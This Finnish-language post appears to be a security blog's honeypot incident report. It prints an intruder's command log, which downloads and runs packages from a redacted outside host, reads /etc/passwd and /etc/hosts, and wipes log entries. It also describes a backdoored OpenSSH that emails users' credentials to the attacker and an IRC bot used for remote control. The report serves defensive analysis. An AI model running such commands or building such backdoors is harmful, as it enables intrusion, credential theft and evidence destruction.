Jouduimme odottamaan hyökkääjän saapumista muutaman tunnin ajan järjestelmän aktivoimisesta. Alla hyökkääjän komentoloki, josta olemme piilottaneet ip- ja verkko-osoitteista osan tarkoituksella.

w
cat /etc/passwd
cat /proc/cpuinfo
ls
wget <poistettu>.com/i[BS]sirsky/bkd
tar xzvf bkd
cd ./–/
./inst
ls
mv zap /bin
cd ..
rm -rf bkd
rm -rf ./–/
ls
w
zap <ip.ip.ip.ip>.d
w
ls
ls
cat /etc/hosts
w
ls
ls -a
wget <poistettu>.com/sirsky/code.tgz
tar xzvf code.jpg
[U-ARROW][BS][BS][BS]tgz
cd .n
./start da[BS][BS]adware
cd ..
rm -rf code.tgz
w

Muutamissa komennoissa olleista kirjoitusvirheistä päätellen hyökkääjänä on tällä kerralla ollut ihminen automaattisesti toimivan ohjelman sijaan. Huomionarvoista on myös ‘w’-komennon (‘who’, näyttää järjestelmään sisäänkirjautuneena olevat käyttäjät) tiuha käyttäminen. Hyökkääjä olisi todennäköisesti lopettanut hyökkäyksen kesken jos olisi havainnut toisia käyttäjiä järjestelmässä.

Hyökkääjä on ensin tarkistanut järjestelmään rekisteröityjen käyttäjien listan /etc/passwd tiedostosta, jonka jälkeen hyökkääjä katsoi koneen prosessorin tiedot. Tämän jälkeen hyökkääjä latasi ulkopuolisesta verkkosoitteesta bkd-nimisen paketin, josta lisää alempana.

Paketin asentamisen jälkeen hyökkääjä poisti paketin lähdekoodit ja tämän lisäksi paketin mukana tulleella ‘zap’-ohjelmalla hyökkääjä poisti käyttöjärjestelmän lokeista kaikki tiedot joissa näkyi hänen käyttämänsä IP-osoite.

Seuraavaksi hyökkääjä tarkisti /etc/hosts-tiedoston ilmeisesti siltä varalta että hyväksikäytetty kone olisi sisäverkossa, jolloin hosts-tiedoston sisältö olisi mahdollisesti paljastanut muita hyväksikäytettäviä koneita sisäverkossa.

Tämän jälkeen hyökkääjä latasi samasta ulkopuolisesta verkko-osoitteesta code.tgz-nimisen paketin josta myös alempana lisää. Paketin asentamisen ja aktivoinnin jälkeen hyökkääjä poisti paketin lähdekoodit järjestelmästä. Tässä vaiheessa päätimme että olimme keränneet tarpeeksi dataa ja suljimme hyökkääjän käyttämän etäyhteyden ja irroitimme koneemme verkosta tutkimuksia varten.

Hyökkääjän ensimmäisenä lataama bkd-niminen paketti oli openSSH-ohjelmiston versio, jonne hyökkääjä oli ujuttanut omaa koodiaan mukaan. Hyökkääjä oli muokannut openSSH-ohjelmistoa siten, että se lähettää muiden käyttäjien sisäänkirjautuessa järjestelmään käyttäjien tunnus/salasana -parit sähköpostilla hyökkääjälle. Näitä tunnuksia käyttäen hyökkääjä voi yrittää murtautua myös muihin tietojärjestelmiin. Koodissa oleva takaovi myös takaa hyökkääjälle pääsyn järjestelmään vaikka tietojärjestelmän pääkäyttäjän salasana vaihdettaisiin.

Hyökkääjän toisena lataama paketti on muokattu kopio EnergyMech IRC-botista. Tämän avulla hyökkääjä voi helposti ajaa komentoja hyväksikäytetyssä järjestelmässä IRC-protokollan yli. IRC-botti oli asetettu liittymään tunnetussa julkisessa IRC-verkossa olevalle kanavalle. Kanavalla oli 12 muuta hyväksikäytettyä linux-palvelinta, joista on lähetetty asianosaisille abuse-viestit järjestelmien turvaamista varten.

Jäljitimme hyökkääjän Romaniassa sijaitsevaan kaupunkiin. Löysimme myös muuta dataa jolla hyökkääjä voidaan viranomaisten puolelta tunnistaa, ja nämä tiedot on lähetty Romanian viranomaisille tutkittavaksi. Valitettavasti hyökkääjän tunnistaminen ei kaikissa tapauksissa ole aina mahdollista.

Jatkamme Tunkeilijat-sarjaa tulevaisuudessa, ja pyrimme esittelemään ylläolevan kaltaisia tapauksia enemmänkin.